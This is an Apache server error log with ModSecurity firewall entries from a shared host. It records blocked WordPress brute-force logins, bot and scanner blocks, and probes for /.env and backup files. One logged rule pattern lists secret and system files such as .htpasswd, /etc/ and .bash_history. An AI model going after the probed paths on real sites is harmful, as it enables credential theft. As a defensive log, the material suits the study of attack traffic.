[Tue May 26 18:16:33.559329 2026] [security2:error] [pid 973439:tid 973473] [remote 212.224.100.2:29963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWKQBg9mKRpdEFs3CLpwAAWiE"]
[Tue May 26 18:16:33.741831 2026] [security2:error] [pid 973439:tid 973642] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWKQBg9mKRpdEFs3CLnwAAAEk"]
[Tue May 26 18:16:34.751955 2026] [security2:error] [pid 973439:tid 973468] [remote 212.224.100.2:29963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWKgBg9mKRpdEFs3CLxwAACxw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:16:36.466793 2026] [security2:error] [pid 973439:tid 973627] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWKwBg9mKRpdEFs3CL5wAAADo"]
[Tue May 26 18:16:38.860211 2026] [security2:error] [pid 973439:tid 973588] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWLgBg9mKRpdEFs3CMLAAAABM"]
[Tue May 26 18:16:39.905009 2026] [security2:error] [pid 973439:tid 973677] [client 223.109.255.206:38187] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWWLwBg9mKRpdEFs3CMVgAAAGw"], referer: http://pic.sogou.com
[Tue May 26 18:16:41.475838 2026] [security2:error] [pid 973439:tid 973680] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWMABg9mKRpdEFs3CMdAAAAG8"]
[Tue May 26 18:16:43.785240 2026] [core:error] [pid 973439:tid 973614] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:16:43.785268 2026] [core:error] [pid 973439:tid 973614] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:16:43.879834 2026] [security2:error] [pid 973439:tid 973674] [client 45.45.237.225:35026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "fonefix.in"] [uri "/js/jquery.colorbox.js"] [unique_id "ahWWMwBg9mKRpdEFs3CM4QAAAGk"]
[Tue May 26 18:16:43.879945 2026] [security2:error] [pid 973439:tid 973674] [client 45.45.237.225:35026] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "fonefix.in"] [uri "/js/jquery.colorbox.js"] [unique_id "ahWWMwBg9mKRpdEFs3CM4QAAAGk"]
[Tue May 26 18:16:43.891046 2026] [core:error] [pid 973439:tid 973606] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:16:43.891070 2026] [core:error] [pid 973439:tid 973606] [client 16.148.188.168:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:16:44.036203 2026] [security2:error] [pid 973439:tid 973676] [client 45.45.237.225:35022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "fonefix.in"] [uri "/.env"] [unique_id "ahWWNABg9mKRpdEFs3CM6AAAAGs"]
[Tue May 26 18:16:44.056992 2026] [security2:error] [pid 973439:tid 973590] [client 45.45.237.225:35042] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "fonefix.in"] [uri "/js/slick.min.js.map"] [unique_id "ahWWNABg9mKRpdEFs3CM6QAAABU"]
[Tue May 26 18:16:44.057121 2026] [security2:error] [pid 973439:tid 973590] [client 45.45.237.225:35042] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "fonefix.in"] [uri "/js/slick.min.js.map"] [unique_id "ahWWNABg9mKRpdEFs3CM6QAAABU"]
[Tue May 26 18:16:44.061032 2026] [security2:error] [pid 973439:tid 973678] [client 45.45.237.225:35154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "fonefix.in"] [uri "/.env.backup"] [unique_id "ahWWNABg9mKRpdEFs3CM7wAAAG0"]
[Tue May 26 18:16:44.065734 2026] [security2:error] [pid 973439:tid 973619] [client 45.45.237.225:35086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "fonefix.in"] [uri "/.env.bak"] [unique_id "ahWWNABg9mKRpdEFs3CM_AAAADI"]
[Tue May 26 18:16:44.127324 2026] [security2:error] [pid 973439:tid 973575] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWMwBg9mKRpdEFs3CMvgAAAAY"]
[Tue May 26 18:16:44.319157 2026] [security2:error] [pid 973439:tid 973598] [client 45.45.237.225:35096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "fonefix.in"] [uri "/fbs-contact.php"] [unique_id "ahWWNABg9mKRpdEFs3CNCgAAAB0"]
[Tue May 26 18:16:44.332356 2026] [security2:error] [pid 973439:tid 973659] [client 45.45.237.225:35008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "fonefix.in"] [uri "/index.php"] [unique_id "ahWWNABg9mKRpdEFs3CNCQAAAFo"]
[Tue May 26 18:16:44.964890 2026] [security2:error] [pid 973439:tid 973636] [client 170.23.8.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWWMwBg9mKRpdEFs3CMswAAAEM"]
[Tue May 26 18:16:46.143297 2026] [security2:error] [pid 973439:tid 973674] [client 14.177.209.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWNABg9mKRpdEFs3CNEwAAAGk"]
[Tue May 26 18:16:46.910126 2026] [security2:error] [pid 973439:tid 973618] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWNQBg9mKRpdEFs3CNMgAAADE"]
[Tue May 26 18:16:48.350459 2026] [autoindex:error] [pid 973439:tid 973571] [client 207.246.106.216:0] AH01276: Cannot serve directory /home2/aarindhr/public_html/canopykaapi.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/woocommerce-analytics/build/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:16:48.404898 2026] [security2:error] [pid 973439:tid 973589] [client 207.246.106.216:60272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/xmlrpc.php"] [unique_id "ahWWOABg9mKRpdEFs3CNiwAAABQ"]
[Tue May 26 18:16:48.478236 2026] [security2:error] [pid 973439:tid 973666] [client 207.246.106.216:60358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWWOABg9mKRpdEFs3CN8AAAAGE"]
[Tue May 26 18:16:48.747683 2026] [security2:error] [pid 973439:tid 973605] [client 207.246.106.216:60220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.106.246.207.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWWOABg9mKRpdEFs3COIwAAACQ"]
[Tue May 26 18:16:49.444804 2026] [security2:error] [pid 973439:tid 973684] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWOABg9mKRpdEFs3COEAAAAHM"]
[Tue May 26 18:16:51.497947 2026] [security2:error] [pid 973439:tid 973593] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWOgBg9mKRpdEFs3COWwAAABg"]
[Tue May 26 18:16:52.415903 2026] [security2:error] [pid 973439:tid 973521] [remote 193.42.61.12:48088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWWPABg9mKRpdEFs3COgAAAalE"]
[Tue May 26 18:16:54.360162 2026] [security2:error] [pid 973439:tid 973647] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWPQBg9mKRpdEFs3COsAAAAE4"]
[Tue May 26 18:16:54.540553 2026] [security2:error] [pid 973439:tid 973531] [remote 193.42.61.12:48088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWWPgBg9mKRpdEFs3COvAAAH1s"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 18:16:55.987438 2026] [http2:info] [pid 983082:tid 983082] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:16:56.291139 2026] [security2:error] [pid 983082:tid 983255] [client 85.208.96.200:30626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-1st/list/"] [unique_id "ahWWQLvhpIlZJOtze4szzgAAALA"]
[Tue May 26 18:16:56.291307 2026] [security2:error] [pid 983082:tid 983255] [client 85.208.96.200:30626] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-1st/list/"] [unique_id "ahWWQLvhpIlZJOtze4szzgAAALA"]
[Tue May 26 18:16:57.614312 2026] [security2:error] [pid 983082:tid 983248] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWQLvhpIlZJOtze4sz0QAAAKk"]
[Tue May 26 18:16:57.927735 2026] [security2:error] [pid 983082:tid 983180] [remote 178.104.164.71:45780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWWQbvhpIlZJOtze4sz6wAA1mE"]
[Tue May 26 18:16:58.291529 2026] [security2:error] [pid 973439:tid 973665] [client 207.246.106.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWOABg9mKRpdEFs3CNkAAAAGA"]
[Tue May 26 18:16:58.439829 2026] [security2:error] [pid 973439:tid 973656] [client 207.246.106.216:60376] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWOABg9mKRpdEFs3CN8QAAAFc"]
[Tue May 26 18:16:58.471810 2026] [security2:error] [pid 973439:tid 973602] [client 207.246.106.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahWWOABg9mKRpdEFs3CNrQAAACE"]
[Tue May 26 18:17:00.307397 2026] [security2:error] [pid 983082:tid 983265] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWQ7vhpIlZJOtze4s0FAAAALo"]
[Tue May 26 18:17:00.914237 2026] [security2:error] [pid 983082:tid 983297] [client 47.128.22.239:26734] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/robots.txt"] [unique_id "ahWWRLvhpIlZJOtze4s0NQAAANo"]
[Tue May 26 18:17:01.474663 2026] [security2:error] [pid 983082:tid 983291] [client 102.221.136.3:58969] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWWRLvhpIlZJOtze4s0KAAAANQ"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 18:17:02.390000 2026] [security2:error] [pid 983082:tid 983290] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWRbvhpIlZJOtze4s0QgAAANM"]
[Tue May 26 18:17:04.384018 2026] [security2:error] [pid 983082:tid 983090] [remote 119.18.52.246:47720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWWSLvhpIlZJOtze4s0dAAApwc"]
[Tue May 26 18:17:05.324038 2026] [security2:error] [pid 983082:tid 983251] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWSLvhpIlZJOtze4s0egAAAKw"]
[Tue May 26 18:17:06.170356 2026] [security2:error] [pid 983082:tid 983330] [client 47.128.30.218:26550] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "omshriinfrastructures.com"] [uri "/robots.txt"] [unique_id "ahWWSrvhpIlZJOtze4s0lgAAAPs"]
[Tue May 26 18:17:08.196802 2026] [security2:error] [pid 983082:tid 983230] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWSrvhpIlZJOtze4s0qgAAAJc"]
[Tue May 26 18:17:09.753720 2026] [security2:error] [pid 983082:tid 983228] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWTLvhpIlZJOtze4s0yQAAAJU"]
[Tue May 26 18:17:11.931128 2026] [proxy:error] [pid 983082:tid 983248] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:17:11.931190 2026] [proxy_http:error] [pid 983082:tid 983248] [client 198.235.24.182:62712] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:17:11.931861 2026] [proxy:error] [pid 983082:tid 983248] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:17:11.931906 2026] [proxy_http:error] [pid 983082:tid 983248] [client 198.235.24.182:62712] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:17:13.219768 2026] [security2:error] [pid 983082:tid 983258] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWULvhpIlZJOtze4s1AQAAALM"]
[Tue May 26 18:17:16.337276 2026] [security2:error] [pid 983082:tid 983265] [client 67.204.242.219:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWUrvhpIlZJOtze4s1NwAAALo"]
[Tue May 26 18:17:17.316582 2026] [security2:error] [pid 983082:tid 983246] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWUrvhpIlZJOtze4s1MQAAAKc"]
[Tue May 26 18:17:19.019884 2026] [security2:error] [pid 983082:tid 983292] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWVbvhpIlZJOtze4s1XwAAANU"]
[Tue May 26 18:17:19.368388 2026] [security2:error] [pid 983082:tid 983243] [client 216.244.66.241:51238] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/products/list"] [unique_id "ahWWV7vhpIlZJOtze4s1ewAAAKQ"]
[Tue May 26 18:17:19.368534 2026] [security2:error] [pid 983082:tid 983243] [client 216.244.66.241:51238] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/products/list"] [unique_id "ahWWV7vhpIlZJOtze4s1ewAAAKQ"]
[Tue May 26 18:17:19.509037 2026] [proxy:error] [pid 983082:tid 983278] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:17:19.509089 2026] [proxy_http:error] [pid 983082:tid 983278] [client 205.210.31.22:65460] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:17:19.510132 2026] [proxy:error] [pid 983082:tid 983278] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:17:19.510174 2026] [proxy_http:error] [pid 983082:tid 983278] [client 205.210.31.22:65460] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:17:20.024817 2026] [autoindex:error] [pid 983082:tid 983216] [client 205.210.31.46:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://mail.juniorwoodies.com/
[Tue May 26 18:17:21.237404 2026] [security2:error] [pid 983082:tid 983246] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWV7vhpIlZJOtze4s1jAAAAKc"]
[Tue May 26 18:17:22.976862 2026] [security2:error] [pid 983082:tid 983337] [client 185.25.2.141:37156] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahWWWbvhpIlZJOtze4s1pQAAAQI"]
[Tue May 26 18:17:23.629317 2026] [security2:error] [pid 983082:tid 983264] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWWWrvhpIlZJOtze4s1ugAAALk"]
